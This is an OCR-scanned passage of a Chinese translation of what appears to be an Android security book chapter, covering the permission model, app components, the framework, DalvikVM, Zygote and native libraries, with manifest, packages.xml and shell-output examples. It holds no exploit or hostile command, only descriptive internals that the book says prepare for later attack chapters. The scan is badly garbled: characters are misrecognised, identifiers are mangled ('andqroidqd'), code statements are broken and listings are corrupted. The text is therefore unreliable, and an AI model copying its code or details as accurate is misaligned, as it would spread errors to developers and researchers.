andqroidqd_id to_passwd() 和 appb_iq_to_passwd() 国 数 。 这 些 函 数 会 把 Unix 的 口令 结构 填 
充 上 相应 的 AID 映射 信息 表 。anaqroid_iq_to_passwd() 函数 会 调用 androig_iinfo_to_ 
passwd () 函数 来 完成 这 一 替换 。 

static passwd* android_ iinfo to passwd(stubs_state t* State， 

const androiqd iqd info* jiinfo) { 
snprintf (state->dir_ buffer_ , sizeof (state->dir buffer ), "/"); 


snprintf(state->sh buffer_, sizeof (state->sh buffer_ ) ， 
"/system/bin/sh"); 
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passwd* pw 
Pw->pw_name 


&state->passwgd_; 
(char*) iinfo->name; 
Pw->pw_uid iinfo->aid; 
pw->pw_gid iinfo->aid; 
Pw->pw_dir state->dir_ buffer ; 
pw->pw_shell = state->sh buffer_ ; 
return pw; 


LE | DE ,| Pw 


2.2.2 ”Android 权限 


Android 的 权限 模型 是 多 方面 的 ， 有 API 权限、 文件 系统 权限 和 IPC 权限 。 在 很 多 情况 下 ， 
这 些 权限 都 会 交织 在 一 起 ,正如 前 面 提 到 的 ,一 些 高 级 权限 会 后 退 映 射 到 低级 别 的 操作 系统 权能 ， 
这 可 能 包括 打开 套 接 字 、 蓝 牙 设 备 和 文件 系统 路 径 等 。 

要 确定 应 用 用 户 的 权限 和 辅助 用 户 组 ，Android 系统 会 处 理 在 应 用 包 的 AndroidManifest.xml 
文件 中 指定 的 高 级 权限 (Manifest 文件 和 权限 会 在 2.3.1 节 详 细 描 述 )。 应 用 的 权限 由 
PackageManager 在 安装 时 从 应 用 的 Manifest 文件 中 提取 ,并 存储 在 /data/system/packages.xml 文件 
中 。 这些 条 目 然后 会 在 应 用 进程 的 实例 化 阶段 用 于 向 进程 授予 适当 的 权限 ( 比如 设置 辅助 用 户 组 
GID )。 下 面 的 代码 片段 显示 了 packages.xml 文件 中 的 Chrome 浏览 器 条 目 , 包括 这 个 应 用 的 唯一 
UID 以 及 它 所 申请 的 权限 。 


<package name="com.android.chrome" 
codePath="/data/app/com.android.chrome-1.apk" 
nativeLibraryPath="/data/data/com.android.chrome/l1ib" 
flags="0" ft="1422al61laa8" it="1422al63bla" 
ut="1422al63bla" version="1599092" userId="10082" 
installer="com.android.vending"> 

<sigs count="1"> 

<cert index="0" /> 

</sigs> 



































<perms> 
<item name="com.android.launcher.permission.INSTALL SHORTCUT" /> 
<item name="android.permission.NFC" /> 


<item name="android.permission.WRITE_ EXTERNAL STORAGE" /> 
<item name="android.permission.ACCESS_ COARSE LOCATION" /> 


<item name="android.permission.CAMERA" /> 
<item name="android.permission.INTERNET" /> 





3 SI 

ne 

权限 至 用 户 组 的 映射 表 存 储 在 /etc/permissions/platform.xml 文件 中 。 它 被 用 来 确定 应 用 设置 
的 辅助 用 户 组 GID。 下 面 的 代码 片段 显示 了 一 些 映射 。 








<permission name="android.permission.INTERNET" > 
<group gid="inet" /> 
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</permission> 


<permission name="android.permission.CAMERA" > 
<group gid="camera" /> 
</permission> 





<permission name="android.permission.READ LOGS" > 
<group gid="]log" /> 
</permission> 


<permission name="android.permission.WRITE EXTERNAL STORAGE" > 
<group gid="sdcard_rw" /> 
</permission> 


在 应 用 包 条 目 中 定义 的 权限 后 面 会 通过 两 种 方式 实施 检查 : 一 种 检查 在 调用 给 定 方法 时 进 
行 ， 由 运行 环境 实施 ; 另 一 种 检查 在 操作 系统 底层 进行 ， 由 库 或 内 核实 施 。 

1. API 权限 

API 权限 用 于 控制 访问 高 层次 的 功能 ， 这 些 功能 存在 于 Android API、 框 架 层 ， 以 及 某 种 情 
况 下 的 第 三 方 框架 中 。 一 个 使 用 API 权 限 的 常见 例子 是 READ_PHONE_STATE ,这 个 权限 在 Android 
文档 中 定义 为 允许 “对 手机 状态 的 只 读 访 问 ”。 应 用 若 申请 该 权限 ， 随 后 就 会 授予 该 权限 ， 从 而 
可 以 调用 关于 查询 手机 信息 的 多 种 方法 ， 其 中 包括 在 TelephonyManager 类 中 定义 的 方法 ， 如 
getDeviceSoftwareVersion 和 getDeviceId 等 。 

前 面 提 到 过 , 一 些 API 权 限 与 内 核 级 的 安全 实施 机 制 相对 应 。 例 如 , 被 授予 INTERNET 权限 ， 
意味 着 申请 权限 应 用 的 UID 将 会 被 添加 到 inet 用 户 组 ( GID 3003 ) 的 成 员 中 。 该 用 户 组 的 成 员 
具有 打开 AF_INET 和 AF_INET6 套 接 字 的 能 力 ， 而 这 是 一 些 更 高 层次 API 功能 〈 如 创建 
HttpURLConnection 对 象 ) 所 必需 的 。 

在 第 4 章 中 ,我们 还 将 讨论 了 API 权 限 及 实施 检查 机 制 中 的 一 些 玖 忽 和 问题 。 

2. 文件 系统 权限 

Android 的 应 用 沙 箱 严重 依赖 于 严格 的 Unix 文件 系统 权限 模型 。 默 认 情 况 下 ， 应 用 的 唯一 
UID 和 GID 都 只 能 访问 文件 系统 上 相应 的 数据 存储 路 径 。 注 意 ， 以 下 代码 清单 中 的 UID 和 GID 
(分 别 在 第 2 列 和 第 3 列 ) 对 于 目录 都 是 唯一 的 ,它们 的 权限 被 设置 为 只 有 这 些 UID 和 GID 才能 
访问 这 些 目 录 。 


root@android:/ # ls -1 /data/data 
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drwxr=X==K UO0a3 u0_a3 ... Com.android.browser 

drwxr-x--x u0_a4 u0_a4 ... com.android.calculator2 

drwxr-x--x u0_a5 u0_a5 ... Com.android.calendar 

drwxr-x--x U0_a24 u0_a24 ... com.android.camera 

drwxr-x-=¥ U0 aD55 U0 lad 0: ‘Com twitter.android 

drwxr-x--x Uu0_a56 u0_a56 ... com.ubercab 

drwxr-x--x u0_ a53 u0_a53 ... com.yougetitback.androidapplication.virgin. 
mobile 

drwxr-x--xXx u0_a31 u0_a31 ... jp.co.omronsoft.openwnn 
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相应 地 , 由 这 些 应 用 创建 的 文件 也 会 拥有 相应 的 权限 设置 。 以 下 代码 清单 中 显示 了 某 个 应 用 
的 数据 目录 ， 子 目录 和 文件 的 属 主 和 权限 都 被 只 设置 给 该 应 用 的 UID 和 GID。 


root@android:/data/data/com.twitter.android # ls -1R 








drwxrwx--x u0_a55 u0_a55 2013=1051 


7 00:07 cache 
drwxrwx--x u0_a55 0ass 2013-10-17 00:07 databases 
drwxrwx--x u0_a55 u0_a55 2013-10-17 00:07 files 
Jrwxrwxrwx install install 2013=10=22: T1816" 11 <S 
/data/app-lib/com.twitter.android-1 
drwxrwx--x U0_a55 u0_a55 2013-10-17 00:07 shared_prefs 

/cache 
drwx-----—-— u0_a55 u0_a55 2013=T0=17, 00:07 











com.android.renderscript.cache 


./cache/com.android.renderscript.cache: 


./databases: 

-rw-rw---- u0_a55 这 0 二 55 184320 2013=10=17 06547 .0=39bg 

二 W0455 u0_a55 8720.2013=10=17 06:47. 0=3..db=<journal 
-rw-rw---- u0_a55 u0_a55 61440 2013-10-22 18:17 global.db 
-IW------— M0 .355 u0_a55 16928 2013-10-22 18:17 global.db-journal 
./files: 

(Sap, dr u0_a55 u0_a55 9013 一 下 022 二 88 


com.crashlytics.sdk.android 


./files/com.crashlytics.sdk.android: 
TW u0_a55 u0_a55 80 2013-10-22 18:18 
5266C1300180-0001-0334-EDCCO5CFF3D7BeginSession.cls 


./shared prefs 

-rw-rw---- uU0_a55 u0_a55 155 2013-10-17 00:07 com.crashlytics.prefs. 
Xm] 

-rw-rw---- u0_a55 u0_a55 143 ZO0T13=10=17 00307 


com.twitter.androiqd preferences.xml 

正如 前 面 所 提 到 的 , 特定 的 辅助 用 户 组 GID 用 于 访问 共享 资源 ,如 SD 卡 或 其 他 外 部 存储 器 。 
作为 一 个 例子 , 注意 在 HTC One V 手机 上 运行 mount 和 1s 命令 的 输出 结果 , 特别 是 /mnt/sdcard 
的 路 径 。 


root@android:/ # mount 





/dev/block/dm-2 /mnt/sdcard vfat rw,dirsync,nosuid,nodev,noexec,relatime, 
uid=1000,gid=1015, fmask=0702,dmask=0702,allow_utime=0020,codepage=cp437, 
ijocharset=iso8859-1,shortname=mixed,utf8,errors=remount-ro 0 0 


root@android:/ # ls -1 /mnt 


d---rwxr-x system sdcard_rw 1969=12=31 11935300 -sdcard 
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这 里 你 可 以 看 到 SD 卡 被 使 用 GID 1015 进行 挂 载 ， 对 应 为 sdcarg_rw 用 户 组 。 应 用 请 求 
WRITE_EXTERNAL_STORAGE 权限 后 ， 会 将 自己 的 UID 添加 到 这 个 组 中 ， 得 到 对 这 一 路 径 的 写 
权限 。 

3. IPC 权限 

IPC 权限 直接 涉及 应 用 组 件 ( 以 及 一 些 系统 的 IPC 设 施 ) 之 间 的 通信 ， 虽然 与 API 权限 也 有 
一 些 重 且 。 这 些 权限 的 声明 和 检查 实施 可 能 发 生 在 不 同 层次 上 ,包括 运行 环境 、 库 函数 , 或 直接 
在 应 用 上 。 具 体 来 说 ， 这 个 权限 集合 应 用 于 一 些 在 Android Binder IPC 机 制 之 上 建立 的 主要 
Android 应 用 组 件 。 关 于 这 些 组 件 和 Binder 的 详细 信息 ， 本 章 后 面 会 详细 描述 。 
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本 方 将 详细 介绍 Android 软件 栈 中 与 安全 最 相关 的 组 件 ， 包 括 应 用 层 、Android 框架 层 、 
DalvikVM、 用 户 空间 的 支持 性 原生 代码 与 相关 服务 ， 以 及 Linux 内 核 屋 。 这 将 为 我 们 理解 后 续 
章节 对 这 些 组 件 的 详细 介绍 打下 基础 ， 并 为 我 们 攻击 这 些 组 件 提 供 必 要 的 知识 。 
























































2.3.1 Android 应 用 层 


为 了 了 解 如 何 评估 和 攻击 Android 应 用 层 的 安全 性 ， 你 首先 需要 了 解 它 们 是 如 何 工 作 的 。 本 
节 讨 论 了 Android 应 用 、 应 用 运行 时 和 支持 性 PC 机 制 的 安全 相关 部 分 。 这 也 会 为 理解 第 4 章 英 
定 基础 。 

应 用 通常 被 分 为 两 类 : 预 装 应 用 与 用 户 安装 的 应 用 。 预 装 应 用 包括 谷歌 、 原 始 设备 制造 商 
( OEM ) 或 移动 运营 商 提供 的 应 用 ， 如 日 历 、 电 子 邮件 、 浏 览 器 和 联系 人 管理 应 用 等 。 这 些 应 用 
的 程序 包 保 存在 /system/app 目录 中 。 其 中 有 些 应 用 可 能 拥有 提升 的 权限 或 权能 ,因此 人 们 会 特别 
感 兴趣 。 用 户 安装 的 应 用 是 指 那些 由 用 户 自己 安装 的 应 用 ， 无 论 是 通过 Google Play 商店 等 应 用 
市 场 直 接 下 载 ， 还 是 通过 pm install 或 aqb install 进行 安装 。 这 些 应 用 以 及 预 安装 应 用 的 
更 新 都 将 保存 在 /data/app 目录 中 。 

Android 在 与 应 用 相关 的 多 种 用 途中 使 用 公共 密 钥 加 密 算 法 。 首先 , Android 使 用 一 个 特殊 的 
平台 密 铀 来 签署 预 安装 的 应 用 包 。 使 用 这 个 密 钥 签署 的 应 用 的 特殊 之 处 它们 拥有 system 用 户 权 
限 。 其 次 ， 第 三 方 应 用 是 由 个 人 开发 者 生成 的 密 钥 签 名 的 。 对 于 预 安 装 应 用 和 用 户 安装 应 用 ， 
Android 都 使 用 签名 机 制 来 阻止 未 经 授权 的 应 用 更 新 。 

主要 的 应 用 组 件 

尽管 Android 应 用 由 无 数 个 组 件 组 成 , 但 本 节 将 重点 介绍 那些 与 Android 系统 版 本 无 关 , 在 大 多 
数 应 用 中 都 值得 关注 的 组 件 。 这 些 组 件 包括 AndroidManifest、Intent、Activity 、BroadcastReceiver、 
Service 和 Content Provider。 后 面 4 类 组 件 代 表 了 PC 通信 端点 ( endpoint )， 它 们 有 一 些 非常 有 趣 的 安 
全 属性 。 

AndroidManifest.xml 

所 有 的 Android 应 用 包 (APK ) 都 必须 包括 AndroidManifest.xml 文件 ， 这 个 XML 文件 含有 
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应 用 的 信息 汇总 ， 具 体 包 括 如 下 内 容 。 
口 唯一 的 应 用 包 名 (如 com.wiley .SomeApp ) 及 版 本 信息 。 
口 Activity 、Service 、BroadcastReceiver 和 搬 桩 定义 。 
口 权限 定义 (包括 应 用 请 求 的 权限 以 及 应 用 自 定义 的 权限 )。 
口 关于 应 用 使 用 并 一 起 打包 的 外 部 程序 库 的 信息 。 
口 其 他 支持 性 的 指令 ， 比 如 共用 的 UID 信息 、 首 选 的 安装 位 置 和 UI 信息 (如 应 用 启动 时 的 
图 标 ) 等 。 
Manifest 文件 中 一 个 特别 有 趣 的 部 分 是 shareqUserIda 属性 。 简 单 地 说 , 如 果 两 个 应 用 由 相 
同 的 密 钥 签名 ， 它 们 就 可 以 在 各 自 的 Manifest 文件 中 指明 同一 个 用 户 标识 符 。 在 这 种 情况 下 , 这 
两 个 应 用 就 会 在 相同 的 UID 环境 下 运行 ， 从 而 能 使 这 些 应 用 访问 相同 的 文件 系统 数据 存储 以 及 
潜在 的 其 他 资源 。 

Manifest 文件 经 常 是 由 开发 环境 自动 产生 ， 比 如 Eclipse 或 Android Studio， 然 后 在 构建 过 程 
中 由 明文 XML 文件 转换 为 二 进 制 XML 文件 。 

Intent 

应 用 间 通 信 的 一 个 关键 组 件 是 Intent。Intent 是 一 种 消息 对 象 , 其 中 包含 一 个 要 执行 操作 的 相 
关 信息 ， 将 执行 操作 的 目标 组 件 信 息 ( 可 选 )， 以 及 其 他 一 些 ( 对 接收 方 可 能 非常 关键 的 ) 标志 
位 或 支持 性 信息 。 几 乎 所 有 常用 的 动作 一 一 比如 在 一 个 邮件 中 点 击 链 接 来 启动 浏览 器 ,通知 短信 
应 用 收 到 SMS 短信 ， 以 及 安装 和 缀 载 应 用 ， 等 等 一 一 都 涉及 在 系统 中 传递 Intent。 

这 类 似 于 一 个 进程 间 调 用 (IPC ) 或 远程 过 程 调用 ( RPC ) 机 制 ， 其 中 应 用 组 件 可 以 通过 编 
程 方 式 和 其 他 组 件 进行 交互 ,调用 功能 或 者 共享 数据 。 在 底层 沙 箱 ( 文件 系统 、AID 等 ) 进行 安 
全 策略 实施 的 情况 下 , 应 用 之 间 通 常 使 用 这 个 API 进行 交互 。 如 果 调 用 方 或 被 调用 方 指 明了 发 送 
或 接收 消息 的 权限 要 求 ， 那 么 Android 运行 时 将 作为 一 个 参考 监视 器 ， 对 Intent 执行 权限 检查 。 

当 在 Manifest 文件 中 声明 特定 的 组 件 时 , 可 以 指明 一 个 Intent Filter ,来 定义 端点 处 理 的 标准 。 
Intent Filter 特别 用 于 人 处理 那些 没有 指定 目标 组 件 的 Intent ( 即 隐 式 Intent )。 

例如 ,假设 一 个 应 用 的 Manifest 文件 中 包含 了 一 个 自 定义 的 权限 ( com.wiley .permission. 
INSTALL_WIDGET ) 和 一 个 Activity ( com.wiley .MyApp.InstallWwidgetActivity ), 后 者 使 
用 这 个 权限 来 限制 启动 InstallwidgetActivity。 


<manifest android:versionCode="1" android:versionName="1.0" 
package="com.wiley .MyApp" 














































































































<permission android:name="com.wiley.permission.INSTALL WIDGET" 
android:protectionLevel="signature" /> 


<activity android:name=".InstallWidgetActivity" 
android:permission="com.wiley.permission.INSTALL WIDGET"/> 


在 这 里 , 我 们 看 到 了 权限 声明 和 Activity 声明 。 还 要 注意 , 权限 拥有 签名 的 ProtectionLevel 
属性 。 这 限定 了 可 以 请 求 这 一 权限 的 应 用 , 它们 必须 是 与 初始 定义 这 一 权限 的 应 用 使 用 同一 私 钥 
进行 签名 的 其 他 应 用 。 
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Activity 

简单 地 说 ，Activity 是 一 种 面向 用 户 的 应 用 组 件 或 用 户 界面 (UI )。Activity 基于 Activity 
基 类 ,包括 一 个 窗口 和 相关 的 UI 元 素 .Activity 的 底层 管理 是 由 被 称 为 Activity 管理 服务 ( Activity 
Manager ) 的 组 件 来 进行 处 理 的 ， 这 一 组 件 也 处 理应 用 之 间或 应 用 内 部 用 于 调用 Activity 的 发 送 
Intent。 这 些 Activity 在 应 用 的 Manifest 文件 中 定义 ， 具 体 如 下 : 








<activity android:theme="@style/Theme_NoTitle_ FullScreen" 
android:name="com.yougetitback.androidapplication.ReportSplashScreen" 
android:screenOrientation="portrait" /> 

<activity android:theme="@style/Theme_NoTitle FullScreen" 
android:name="com.yougetitback.androidapplication.SecurityQuestionScreen" 
android:screenOrientation="portrait" /> 

<activity android:label="@string/app_name" 
android:name="com.yougetitback.androidapplication.SplashScreen" 
android:clearTaskOnLaunch="false" android:launchMode="singleTask" 
android:screenOrientation="portrait"> 





<intent-filter> 
<action android:name="android.intent.action.MAIN" /> 
</intent-filter> 








这 里 ， 我 们 可 以 看 到 Activity 的 定义 ， 以 及 对 样式 /UI、 屏 幕 方向 等 信息 的 指定 。 其 中 
launchMode 属性 值得 关注 ， 因 为 它 会 影响 Activity 的 启动 方式 。 在 这 种 情况 下 ， singleTask 
值 表示 在 同一 时 间 只 能 有 一 个 特定 Activity 实例 存在 ， 而 不 是 每 次 调用 时 启动 一 个 单独 的 实例 。 
这 一 应 用 的 当前 实例 ( 如 果 有 的 话 ) 将 接收 并 处 理 调 用 该 Activity 的 Intent。 

Broadcast Receiver 

另 一 种 类 型 的 了 PC 端点 是 Broadcast Receiver。 它们 通常 会 在 应 用 希望 接收 一 个 匹配 某 种 特定 
标准 的 隐 式 Intent 时 出 现 。 例 如 ， 一 个 应 用 想 要 接收 与 短 消 息 关 联 的 Intent， 它 需要 在 Manifest 
文件 中 注册 一 个 Receiver， 使 用 Intent Filter 来 匹配 android.provider.Telephony .SMS_ 
RECEIVED 动作 。 
























































<receiver android:name=".MySMSReceiver"> 
<intent-filter android:priority:"999"> 
<action android:name="android.provider.Telephony .SMS_ RECEIVED" /> 
</intent-filter> 
</receiver> 





注意 ”Broadcast Receiver 也 可 以 使 用 registerReceiver 方法 在 运行 时 以 编程 方式 注册 , 这 个 
方法 可 以 被 重 载 以 对 Receiver 设置 权限 。 





在 Broadcast Receiver 上 设置 权限 要 求 可 以 限定 哪些 应 用 能 够 往 这 个 端点 发 送 Intent。 
Service 


Service 是 一 类 在 后 台 运 行 而 无 需 用 户 界面 的 应 用 组 件 ， 用 户 不 用 直接 与 Service 所 属 应 用 进 
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行 交互 。 Android 系统 上 一 些 常 见 的 Service 例子 包括 SmsReceivetrService 和 Bluetoothopp 
Service。 虽 然 这 些 Service 都 运行 在 用 户 直 接 可 见 视图 之 外 ,但 与 其 他 Android 应 用 组 件 一 样 ， 
它们 也 可 以 利用 IPC 机 制 来 发 送 和 接收 Intent。 

Service 必须 在 应 用 的 Manifest 文件 中 声明 ， 例 如 ， 以 下 是 一 个 Service 的 简单 定义 ， 同 时 设 
置 了 Intent Filter: 


























<service 
android:name="com.yougetitback.androidapplication.FindLocationService"> 
<intent-filter> 
<action 
android:name="com.yougetitback.androidapplication.FindLocationService" /> 
</intent-filter> 
</service> 


Service 通常 可 以 被 停止 、 启 动 或 绑 定 ,所 有 这 些 动作 都 通过 Intent 来 触发 。 在 最 后 一 种 情况 
中 , 绑 定 一 个 Service 后 ,另外 一 组 PC 或 RPC 过 程 将 会 提供 给 调用 者 。 这些 过 程 取 决 于 Service 
的 具体 实现 ， 并 更 深入 地 利用 了 Binder 服务 (将 在 2.3.5 节 讨 论 )。 

Content Provider 

Content Provider 是 为 各 种 通用 、 共 享 的 数据 存储 提供 的 结构 化 访问 接口 。 例 如 ，Contacts 
Provider ( 联系 人 提供 者 ) 和 Calendar Provider (日 历 提供 者 ) 分 别 对 联系 人 信息 和 日 历 条 目 进行 
集中 式 仓 库 管 理 ， 这 两 项 内 容 可 以 被 其 他 应 用 ( 使 用 适当 权限 ) 访问 。 应 用 还 可 以 创建 自己 的 
Content Provider， 并 且 可 以 选择 暴露 给 其 他 应 用 。 通 过 这 些 Provider 公开 的 数据 的 后 台 通 常 是 
SQLite 数据 库 ， 或 是 直接 访问 的 系统 文件 路 径 〈 如 播放 器 对 MP3 文件 编排 的 索引 和 共享 路 径 )。 

像 其 他 的 应 用 组 件 一 样 ， 对 Content Provider 的 读 写 能 力也 可 以 用 权限 进行 控制 。 考 虑 如 下 
从 一 个 AndroidManifest.xml 文件 中 截取 的 代码 片段 : 


<provider android:name="com.wiley.example.MyProvider" 
android:writePermission="com.wiley .example.permission.WRITE" 
android:authorities="com.wiley .example.data" /> 


该 应 用 声明 了 一 个 名 为 MyProvider 的 Content Provider， 对 应 于 实现 Provider 功能 的 类 。 
然后 ， 它 声 明了 一 个 名 为 com.wiley .example.permission .WRITE 的 writePermission, 
表明 只 有 携带 这 一 自 定义 权限 的 应 用 才能 写 入 这 个 Provider。 最 后 ， 它 指明 了 Provider 将 采取 动作 
的 authorities 或 内 容 统 一 资源 描述 符 (URI ), Content URI 采 用 content://[authorityname] 
的 格式 , 可 以 额外 包含 路 径 和 参数 信息 ( 如 content : //com.wiley .example.data/foo ), 而 这 
些 信息 对 Provider 的 底层 实现 可 能 非常 关键 。 

在 第 4 章 中 ,我 们 将 展示 一 系列 发 现 和 攻击 这 些 PC 端点 的 手段 。 
















































































2.3.2 ”Android 框架 层 

作为 应 用 和 运行 时 之 间 的 连接 纽带 ，Android 框架 层 为 开发 者 提供 了 执行 通用 任务 的 部 件 一 一 
程序 包 及 其 类 。 这 些 任务 可 能 包括 管理 UI 元 素 、 访 问 共 享 数据 存储 ， 以 及 在 应 用 组 件 中 传递 消息 
等 。 也 就 是 说 ， 框 架 层 中 包含 任何 仍然 在 DalvikVM 中 执行 的 非 应 用 特定 代码 。 
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通用 的 框架 层 程 序 包 位 于 anqroidq.* 名 字 空 间 中 ， 如 angdroid.content 或 android. 
telephony。Android 也 提供 了 许多 Java 标准 类 (在 java.* 和 的 javax.x* 名 字 空 间 中 )， 以 及 
一 些 第 三 方程 序 包 ， 如 Apache HTTP 客户 端 库 和 SAXXML 解析 器 。Android 框架 层 还 包括 许多 
用 于 管理 内 部 类 所 提供 功能 的 服务 。 这 些 被 称 为 管理 器 的 服务 由 system_server (将 在 2.3.3 
节 “Zygote” 小 节 中 讨论 ) 在 系统 初始 化 之 后 启动 。 表 2-1 显示 了 其 中 的 一 些 服务 器 ， 以 及 它们 
在 框架 层 中 的 描述 与 角色 。 

















表 2-1 框架 层 中 的 管理 器 
框架 层 服务 描述 























































































































Activity 管理 器 。 ”管理 Intent 的 解析 与 目标 、 应 用 /Activity 的 启动 等 
视图 系统 管理 Activity 中 的 视图 (用 户 可 见 的 UI 组 合 ) 
程序 包 管理 器 管理 系统 上 之 前 或 正在 进入 安装 队列 的 程序 包 相 关 信 息 
电话 管理 器 管理 与 电话 服务 、 无 线 电 状态 、 网 络 与 注册 信息 相关 的 信息 与 任务 
资源 管理 器 为 诸如 图 形 、UI 布局 、 字 符 串 数据 等 非 代 码 应 用 资源 提供 访问 
位 置 管理 器 提供 设置 和 读 取 (GPS、 手 机 、Wi-Fi) 位 置信 息 的 接口 ， 位 置信 息 包括 具体 定位 信息 、 经 纬度 等 
通知 管理 器 管理 不 同 的 事件 通知 ， 比 如 播放 声音 ， 震 动 ，LED 闪 灯 ， 以 及 在 状态 栏 中 显示 图 标 等 
































使 用 ps 命令 , 并 指明 system_server 的 PID 和 -t 选项 , 可 以 从 结果 中 看 到 一 些 管理 器 是 
以 system_server 进程 中 的 线程 运行 的 。 




















root@generic:/ # ps -t -p 376 

NSER RI ERPID ... NAME 

system 376 52 ... System server 
system 389 376 ... SensorService 
system 390 376 ... WindowManager 
system 391 376 .. ActivityManager 
system 399 376 ... PackageManager 


2.3.3 DalvikVM 





























DalvikVM 是 基于 寄存 器 而 不 是 栈 的 。 虽 然 有 人 说 Dalvik 是 基于 Java 的 ， 但 它 并 不 是 Java， 
因为 谷歌 并 不 使 用 Java 的 Logo， 而 且 Android 的 应 用 模型 也 与 JSR (Java 标准 规范 要 求 ) 没有 
关系 。Android 应 用 开发 者 要 记 住 ，DalvikVM 虽然 看 起 来 和 感觉 上 都 像 Java， 但 实际 上 并 不 是 。 
整体 的 开发 流程 大 致 如 下 : 

(1) 开发 者 以 类 似 Java 的 语法 进行 编码 ; 

(2) 源 代码 被 编译 成 .class 文件 ( 也 类 似 于 Java ); 

(3) 得 到 的 类 文件 被 翻译 成 Dalv 这 字 节 码 ; 

(4) 所 有 类 文件 被 合并 为 一 个 Dalvik 可 执行 文件 (DEX ) 文件 ; 

(5) 字 节 码 被 DalvikVM 加 载 并 解释 执行 。 

作为 一 个 基于 寄存 器 的 虚拟 机 ,Dalv 玉 拥有 大 约 64 000 个 虚拟 寄存 器 。 不 过 通常 只 会 用 到 
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前 16 个 ,偶尔 会 用 到 前 256 个 。 这 些 寄存 器 被 指定 为 虚拟 机 内 存 的 存储 位 置 ， 用 于 模拟 微 处 理 
器 的 寄存 器 功能 。 就 像 实际 的 微 处 理 屁 一 样 ，DalvikVM 在 执行 字 节 码 时 ， 使 用 这 些 寄存 器 来 保 
持 运行 状态 ， 并 跟踪 一 些 值 。 

DalvikVM 是 专门 针对 艇 人 式 系统 的 约束 ( 如 内 存 小 和 人 处 理 右 速度 慢 ) 而 设计 的 。 因 此 , 在 
DalvikVM 设 计时 考虑 到 了 速度 和 运行 效率 。 但 虚拟 机 毕竟 只 是 对 底层 CPU 寄存 器 机 的 一 个 抽象 ， 
本 质 上 就 意味 着 在 运行 效率 上 有 所 损失 ， 而 这 也 正 是 谷歌 力求 减轻 这 些 副 作用 的 原因 。 

为 了 在 这 些 约束 中 发 挥 更 大 的 能 力 ，DEX 文件 在 被 虚拟 机 解释 执行 之 前 会 进行 优化 处 理 。 
对 于 从 一 个 Android 应 用 中 启动 的 DEX 文件 ， 这 种 优化 通常 只 在 应 用 第 一 次 启动 时 进行 一 次 。 
优化 过 程 的 结果 是 一 个 优化 后 的 DEX 文件 (ODEX )。 需 要 注意 ，ODEX 文件 是 无 法 在 不 同 版 本 
的 DalvikVM 之 间或 是 不 同 设备 之 间 进 行 移植 的 。 

与 Java 虚拟 机 类 似 ，DalvikVM 使 用 Java Native Interface ( JNI ) 与 底层 原生 代码 进行 交互 。 
这 一 功能 允许 在 Dalvik 代码 和 原生 代码 之 间 相 互 调用 。 谷 了解 DalvikVM、DEX 文件 格式 以 及 JNI 
on Android 的 更 详细 信息 ， 可 查阅 Dalvik 官方 文档 ， 网 址 为 http://milk.com/kodebase/dalvik-docs- 
mirror/docs/。 

Zygote 

Android 设备 启动 时 ，Zygote 进程 是 最 先 运行 的 进程 之 一 。 接 下 来 ，Zygote 负责 启动 其 他 服 
务 以 及 加 载 Android 框架 所 使 用 的 程序 库 。 然 后 ，Zygote 进程 作为 每 个 Dalvik 进程 的 加 载 器 , 通 
过 复制 自身 进程 副本 (也 被 称 为 forking， 分 支 ) 来 创建 进程 。 这 种 优化 方案 可 以 避免 重复 那些 
不 必要 且 消 耗 大量 资 源 的 加 载 过 程 ， 即 启动 Dalvik 进程 (包括 应 用 ) 时 加 载 Android 框架 及 其 依 
赖 库 。 作 为 优化 结果 ， 核 心 库 、 核 心 类 和 对 应 的 扒 结 构 会 在 DalvikVM 的 所 有 实例 之 间 共 享 。 这 
也 给 攻击 带 来 了 一 些 有 趣 的 可 能 性 ， 你 会 在 第 12 章 中 阅读 到 更 详细 的 内 容 。 

Zygote 的 第 二 大 功能 是 启动 system_server 进程 , 这 个 进程 容纳 了 所 有 系统 核心 服务 , 并 
在 system 的 AID 用 户 环 境 中 以 特权 权限 运行 。 接 下 来 ，system_server 进程 启动 所 有 在 表 2-1 
中 介绍 的 Android 框架 层 服务 。 

























































































注意 ”system server 进程 是 如 此 重要 ， 以 致 杀 死 这 一 进程 会 让 设备 看 上 去 像 重 新 启动 了 一 
样 。 然 而 ， 实 际 上 只 是 将 设备 的 Dalvik 子 系 统 重新 启动 了 。 


在 初始 启动 后 ，Zygote 通过 RPC 和 IPC 机 制 为 其 他 Dalvik 进程 提供 程序 库 访 问 ， 这 是 承载 
Android 应 用 组 件 的 进程 实际 启动 的 机 制 。 


2.3.4 用 户 空 间 原 生 代 码 层 


操作 系统 用 户 空间 内 的 原生 代码 构成 了 Android 系统 的 一 大 部 分 , 这 一 层 主要 由 两 大 类 组 件 
构成 : 程序 库 和 核心 系统 服务 。 本 节 将 讨论 这 两 大 类 组 件 , 并 详 述 一 些 属于 这 两 大 类 的 单独 组 件 。 

1. 程序 库 

Android 框架 层 中 的 较 高 层次 类 所 依赖 的 许多 底层 功能 都 是 通过 共享 程序 库 的 方式 来 实现 ， 
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并 通过 JNI 进行 访问 的 。 在 这 其 中 ， 许 多 程序 库 都 也 是 在 其 他 类 Unix 系统 中 所 使 用 的 知名 开源 
项 目 。 比 如 ,SQLite 提供 了 本 地 数据 存储 功能 , Webkit 提供 了 可 内 和 的 Web 浏览 器 引擎 , FreeType 
提供 了 位 图 和 矢量 字体 泻 染 功 能 。 

供应 商 特定 的 程序 库 , 即 那 些 为 某 一 设备 型 号 提供 硬件 支持 的 代码 库 , 保存 在 /Vendor/lib (或 
/system/vendor/lib ) 路 径 。 其 中 包括 对 图 形 显示 设备 、GPS 收发 器 或 蜂 容 式 无 线 电 的 底层 支持 库 
等 。 非 厂商 特定 的 程序 库 则 保存 在 /systemylib 路 径 中 ， 通 常会 包括 一 些 外 部 项 目 ， 比 如 像 下 面 这 
些 库 。 
D libexif: 一 个 JPEG EXIF 格式 的 处 理 库 。 
口 libexpat: Expat 的 XML 解析 响 。 
D libaudioalsa/libtinyalsa: ALSA 音频 库 。 
口 libbluetooth: BlueZ Linux 蓝牙 库 。 
口 libdbus: D-Bus 的 IPC 库 。 

这 些 只 是 Android 的 大 量程 序 库 中 的 一 小 部 分 ， 一 个 运行 Android 4.3 的 设备 中 包含 了 超过 
200 个 共享 程序 库 。 

然而 , 并非 所 有 的 底层 程序 库 都 是 标准 的 ，Bionic 就 是 一 个 值得 注意 的 特例 。Bionic 是 BSD 
C 运行 时 库 的 一 个 变种 ， 旨 在 提供 更 小 的 内 存 使 用 空间 ， 更 好 的 优化 ， 同 时 避免 产生 GNU 公共 
